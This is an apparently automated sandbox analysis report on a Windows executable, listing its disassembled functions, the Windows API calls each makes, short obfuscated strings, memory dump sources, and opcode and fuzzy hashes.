CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,001DA5C7,00000000), ref: 001CB80A
CreateDirectoryTransactedA.KERNEL32 ref: 001CB823
CommitTransaction.KTMW32(00000000,?,001DA5C7,00000000), ref: 001CB82E
RollbackTransaction.KTMW32(00000000,?,001DA5C7,00000000), ref: 001CB836

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Transaction$Create$CommitDirectoryRollbackTransacted
String ID:
API String ID: 629542334-0
Opcode ID: b2dbd7b43b9d6b6ef498e6bd7977667c6eff98f0fac92826e593fd0b0ad165cc
Instruction ID: 334da37f88cfe4ef3f2ce0418dd4da186c10ec9672f1e22a72d53441e42a0490
Opcode Fuzzy Hash: b2dbd7b43b9d6b6ef498e6bd7977667c6eff98f0fac92826e593fd0b0ad165cc
Instruction Fuzzy Hash: 3AF0B471105115BFE7245799ACCEE677A2CEB457B4B240219F912C30D0D770DC018AB1

Uniqueness

Uniqueness Score: -1.00%

Function 001CB7A7, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,?,?,?,?,00000000,?,?), ref: 001CB7BA
DeleteFileTransactedA.KERNEL32 ref: 001CB7D1
CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000000,?,?,?,?,001DA87D,00000012,?,?), ref: 001CB7DC
RollbackTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000000,?,?,?,?,001DA87D,00000012,?,?), ref: 001CB7E4

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Transaction$CommitCreateDeleteFileRollbackTransacted
String ID:
API String ID: 3802493581-0
Opcode ID: c640f53ecf8a2c70aaecceaadf22206e481ec789095c31ff20793b0af2af9670
Instruction ID: c55159132b73c1e1e2c961aa8a4716dd02f2b4e791b56392ae990e3ef6a38f58
Opcode Fuzzy Hash: c640f53ecf8a2c70aaecceaadf22206e481ec789095c31ff20793b0af2af9670
Instruction Fuzzy Hash: 19F05E72104210BFEB345BA9EC4EE6B366CDB85770B21065DBC12D71D0D7609D428A71

Uniqueness

Uniqueness Score: -1.00%

Function 001D4292, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 001D42F5

Part of subcall function 001C9146: std::exception::exception.LIBCMT ref: 001C915A

_Deallocate.LIBCONCRT ref: 001D4374

Strings

4hU@[Y]W, xrefs: 001D4320, 001D4325

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Deallocate$std::exception::exception
String ID: 4hU@[Y]W
API String ID: 3808330516-1563900851
Opcode ID: c6c78ac8074d79f0b9944a51b9137d9951c0b3ca7615abff6be92b6d4b79187d
Instruction ID: a2368b06c29d11dd4a6557f4a74b2643fa6b16fba201c5ec44f145879f063d77
Opcode Fuzzy Hash: c6c78ac8074d79f0b9944a51b9137d9951c0b3ca7615abff6be92b6d4b79187d
Instruction Fuzzy Hash: 1E31A2B2500215BBDB14DFADD88589BBBADEF59360714056AF819C7341E730ED1087E4

Uniqueness

Uniqueness Score: -1.00%

Function 00217E01, Relevance: 4.7, APIs: 3, Instructions: 177fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00217596: GetConsoleCP.KERNEL32(8304488B,0020657E,00000000), ref: 002175DE

WriteFile.KERNEL32(?,00000000,?,00205098,00000000,001FFBCC,0020657E,0020657E,00000010,00205098,00000000,8304488B,001FFBCC,001FFBCC,?), ref: 00217F52
GetLastError.KERNEL32(?,0020657E), ref: 00217F5C
__dosmaperr.LIBCMT ref: 00217FA1

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID:
API String ID: 251514795-0
Opcode ID: ee858aa892f9c1d200d31e14cd6a2cab6b36143e015b2fc0bfa8670ccd44c0c9
Instruction ID: 9158a589d78101f50ddcd32e39b0c7ce3cbcee884fcbd87956f6c9533f12e64c
Opcode Fuzzy Hash: ee858aa892f9c1d200d31e14cd6a2cab6b36143e015b2fc0bfa8670ccd44c0c9
Instruction Fuzzy Hash: 8E51C47192820EAFDB11DFA4C845BEFB7F8EFA9314F140451E500A7292D7719DA2CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001CA9DC, Relevance: 4.6, APIs: 3, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001CA9E1
___std_fs_directory_iterator_open@12.LIBCPMT ref: 001CAA4C
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 001CAA60

Part of subcall function 001FEFBC: FindNextFileW.KERNEL32(?,?,?,001CAA65,?,?,?,?,?,?,?,?,00000000), ref: 001FEFC5

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileFindH_prologNext___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
String ID:
API String ID: 3696715561-0
Opcode ID: b8aa77d864103c5a9d979ce0cdcdacf949bc9e93e1b9b58c4077cef8d74bf544
Instruction ID: a13084c0ecf5cbfa70ed7955b110d68c0ddfc017039356a4066003f2fb2ea726
Opcode Fuzzy Hash: b8aa77d864103c5a9d979ce0cdcdacf949bc9e93e1b9b58c4077cef8d74bf544
Instruction Fuzzy Hash: CA21A231610619EBDF26EAD4DA81FED73B5AF28318F50441DF90297191D770DA44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 001FEAC9, Relevance: 4.6, APIs: 3, Instructions: 63fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(?,00000000,00000001,00248780,00000000,?,001E0971), ref: 001FEB19
CloseHandle.KERNEL32(?,00000000,00000001,00248780,00000000,?,001E0971), ref: 001FEB30
CloseHandle.KERNEL32(00000000,00000000,00000001,00248780,00000000,?,001E0971), ref: 001FEB45

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: f0b475b1a4b696b111751bcaee086dec410d45980177ec70ebfc41a3a0801f50
Instruction ID: c733c889cee2736d2eb8e43e01097aee5f6421e26b3c14bdfe4fa4aa04ccbcc3
Opcode Fuzzy Hash: f0b475b1a4b696b111751bcaee086dec410d45980177ec70ebfc41a3a0801f50
Instruction Fuzzy Hash: AD21CD70501B04EFDB31DF69D885B66BBE0BF05315F14842EE29B53661C3B4A840CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001DEF49, Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000244,?,?,001DFD07,00000140,?,?,00000000), ref: 001DEF66
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000140,00000000,?,001DFD07,00000140,?,?,00000000,?,001E05B0), ref: 001DEF87
SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,001DFD07,00000140,?,?,00000000,?,001E05B0,?,?,00000244,00248780), ref: 001DEFC1

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$Pointer$Create
String ID:
API String ID: 250661774-0
Opcode ID: e57ae51772c296b3d95a5479397834532f6fb640f3e0c63ebd24a00a1c0f6b21
Instruction ID: d1a1e4c9ac270a775934434e0c2a987b774f148492960374949e2caa63cbb561
Opcode Fuzzy Hash: e57ae51772c296b3d95a5479397834532f6fb640f3e0c63ebd24a00a1c0f6b21
Instruction Fuzzy Hash: 31118271644305BEE7209B7D9C89B56BBE8EB09320F208725F929EB6C1D3B0A9108760

Uniqueness

Uniqueness Score: -1.00%

Function 00219D09, Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,001FFBCC,00000000,00000002,001FFBCC,00000000,?,?,?,00219DB6,00000000,00000000,001FFBCC,00000002), ref: 00219D42
GetLastError.KERNEL32(?,00219DB6,00000000,00000000,001FFBCC,00000002,?,002064A1,?,00000000,00000000,00000001,001FFBCC,?,?,00206557), ref: 00219D4C
__dosmaperr.LIBCMT ref: 00219D53

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: cb91adf809554fe8955ac629f51196f4dd29ba677dff3911a0dce1ee49289ab3
Instruction ID: 6beef599925da51aa20ff64fa683310634e5e654ae7714615cb622b103365ebc
Opcode Fuzzy Hash: cb91adf809554fe8955ac629f51196f4dd29ba677dff3911a0dce1ee49289ab3
Instruction Fuzzy Hash: C6012836620119AFCF25AFA9FC058AE3B69EF85320B240204F9119B1D1E671DDA18B60

Uniqueness

Uniqueness Score: -1.00%

Function 001EB31D, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001EB322

Part of subcall function 001CAC66: __EH_prolog.LIBCMT ref: 001CAC6B

Part of subcall function 001D2D4F: _Deallocate.LIBCONCRT ref: 001D2D64

Part of subcall function 001EBC7F: __EH_prolog.LIBCMT ref: 001EBC84

Part of subcall function 001D2F2D: _Deallocate.LIBCONCRT ref: 001D2F3C

Strings

"\, xrefs: 001EB528

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$Deallocate
String ID: "\
API String ID: 2428181759-2226538752
Opcode ID: e6df0acffcba3f55ab18c36f3b0884c824fce3a1f9b35b2976e3e1612025c88c
Instruction ID: 963efbb6d2fc4db2b44dea1ac7d85f8c80f888041ad8a30a3527635c4ab8180f
Opcode Fuzzy Hash: e6df0acffcba3f55ab18c36f3b0884c824fce3a1f9b35b2976e3e1612025c88c
Instruction Fuzzy Hash: 49C19F30D05298DBDF15EBA4C8916EEBBB1BF65300F5481ADD05ABB242DF305B89CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001DBB90, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001DBB95

Part of subcall function 001F5C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 001F5CB7

Part of subcall function 001F57CC: __EH_prolog.LIBCMT ref: 001F57D1

Strings

z659;6;**>;.;, xrefs: 001DBC17

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$EnvironmentVariable
String ID: z659;6;**>;.;
API String ID: 1561336028-1395785771
Opcode ID: bf9f5cb7a2d7af6684a909a9b4b8583341f10eef665944a8d1d7e476d65d3580
Instruction ID: 53a10e169cb45707d5ec5312ca7f5662dc037659c4e546aa8d0ccf339f04c122
Opcode Fuzzy Hash: bf9f5cb7a2d7af6684a909a9b4b8583341f10eef665944a8d1d7e476d65d3580
Instruction Fuzzy Hash: 65517E31D05249CACF05EFE8D5929EEBBB2AF79300F60845EE5127B352DB741A08CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00214938, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002149EB

Strings

SJ!, xrefs: 002149DB

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID: SJ!
API String ID: 269201875-3611622954
Opcode ID: 0b5c2c17e01f40048ee779ebe93b9cf5548888241608ede3519ed3eb883d3c62
Instruction ID: 956982fe4f8bfc9954a339f9517485c70b19adf9b54e6f376bc9fb676c69616f
Opcode Fuzzy Hash: 0b5c2c17e01f40048ee779ebe93b9cf5548888241608ede3519ed3eb883d3c62
Instruction Fuzzy Hash: 23319C76A106119F8B14DF9DC48499EB7F2FF8932072686A5E529EB360D330AC51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001CA2D4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001CA2D9

Part of subcall function 001C91F2: __EH_prolog.LIBCMT ref: 001C91F7
Part of subcall function 001C91F2: std::exception::exception.LIBCONCRT ref: 001C9298

Strings

Unknown exception, xrefs: 001CA348

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$std::exception::exception
String ID: Unknown exception
API String ID: 1037574509-410509341
Opcode ID: 340879e6de05a459d16cbedc4539f111e515821f9c6e4767c3cc89ef90b11b2c
Instruction ID: 8977948940d142f00b1b59d542aaf0ee74c9bd86e105eda7ee021d6d4a770a42
Opcode Fuzzy Hash: 340879e6de05a459d16cbedc4539f111e515821f9c6e4767c3cc89ef90b11b2c
Instruction Fuzzy Hash: E921AEB2D00205EFCB15DFA8D441AAAFBB1FF58314F10856EE419AB341D3719A55CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001F5C6D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 001F5CB7

Strings

o:<*=?= )&#*, xrefs: 001F5C9F

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnvironmentVariable
String ID: o:<*=?= )&#*
API String ID: 1431749950-870875188
Opcode ID: 814e8aee7ae9289118885ff0de4eac373129927b0400f04d564bd023fe3dd7b0
Instruction ID: 696c50cc273fd5dc44c2a2d62b3f6f0ed7a8c59e32f67922f78277e3d8cb2172
Opcode Fuzzy Hash: 814e8aee7ae9289118885ff0de4eac373129927b0400f04d564bd023fe3dd7b0
Instruction Fuzzy Hash: 9B012270D0438C9ACF15DBF894941EEFFBAAF18300F1081A9D582A7202E3305789CB00

Uniqueness

Uniqueness Score: -1.00%

Function 001D2F2D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 001D2F3C

Strings

4hU@[Y]W, xrefs: 001D2F3A

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Deallocate
String ID: 4hU@[Y]W
API String ID: 1075933841-1563900851
Opcode ID: 3f9308d64d38a26f490ee6755bac7ef647f435150ffc285641e4572aa6ae8d19
Instruction ID: 2e16acf41a7a335cce9185f6c68fedc496e865631858b7c1d2b074ac0a23e15d
Opcode Fuzzy Hash: 3f9308d64d38a26f490ee6755bac7ef647f435150ffc285641e4572aa6ae8d19
Instruction Fuzzy Hash: F2D05E310042008FF3345E08F00176277E5EB11310F200D4EE0D186691C7B5A8848799

Uniqueness

Uniqueness Score: -1.00%

Function 00217A19, Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,8304488B,0020657E,00000000,?,00217F36,00000010,0020657E,00000000,?,001FFBCC,0020657E), ref: 00217AB5
GetLastError.KERNEL32(?,00217F36,00000010,0020657E,00000000,?,001FFBCC,0020657E,0020657E,00000010,00205098,00000000,8304488B,001FFBCC,001FFBCC,?), ref: 00217ADB

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 8ec3b8c9cb2b0643e5216101854ef011b492bc548d87bbf04999a7ba5eb175c7
Instruction ID: 61d95fd19abf6f752694cbd4c80944a586b82cba30212edb64117dbfdca8fb23
Opcode Fuzzy Hash: 8ec3b8c9cb2b0643e5216101854ef011b492bc548d87bbf04999a7ba5eb175c7
Instruction Fuzzy Hash: B1218D34A142199BCB15CF29DC80AEDB7FAEF9D301F2440A9EA46D7211D630DE92CF60

Uniqueness

Uniqueness Score: -1.00%

Function 001C91F2, Relevance: 3.1, APIs: 2, Instructions: 72COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001C91F7
std::exception::exception.LIBCONCRT ref: 001C9298

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prologstd::exception::exception
String ID:
API String ID: 2619619420-0
Opcode ID: 32ab6c5147fc3b259975f08b9775e5c0b5935b25ef3a9222d6b72772850f9005
Instruction ID: 84ca713b5ed0ab81d14c602854b196df99823778fdfd32fd61a0a45d5fd5aa98
Opcode Fuzzy Hash: 32ab6c5147fc3b259975f08b9775e5c0b5935b25ef3a9222d6b72772850f9005
Instruction Fuzzy Hash: 3F31D4B1910218DFCB15DFA8C895ADEBBB8FF29310F54481AE415A7241E7709A55CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001DFCB2, Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,001E05B0,?,?,00000244,00248780,00000000,00000001,?,001E08FF), ref: 001DFCD1
_strlen.LIBCMT ref: 001DFCD8

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentDirectory_strlen
String ID:
API String ID: 942933051-0
Opcode ID: b4a51554359ff5ec99afaa67b1ee91b9c998b6f271f6443be290fbfe6c65583b
Instruction ID: fcf3aa0b56d2d27c79e9bfdf051096c80e2c02b221ace3043386f0809b3ed2a2
Opcode Fuzzy Hash: b4a51554359ff5ec99afaa67b1ee91b9c998b6f271f6443be290fbfe6c65583b
Instruction Fuzzy Hash: 7001FC726187056AD7285768A845FAA73E9DB46720F20013FF457C72D1EB609E838654

Uniqueness

Uniqueness Score: -1.00%

Function 001F5484, Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001F5489

Part of subcall function 001F5346: lstrlenW.KERNEL32(00000000,?,?,?,001F549A), ref: 001F53A8
Part of subcall function 001F5346: lstrcpyW.KERNEL32 ref: 001F53C0
Part of subcall function 001F5346: lstrcpyW.KERNEL32 ref: 001F53CC

_strlen.LIBCMT ref: 001F549D

Part of subcall function 001D16B4: __EH_prolog.LIBCMT ref: 001D16B9

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prologlstrcpy$_strlenlstrlen
String ID:
API String ID: 27009005-0
Opcode ID: 5b61e3a0ab0a311dd063e68fb352e10ce1940a46cc208bfbfe888656423414a9
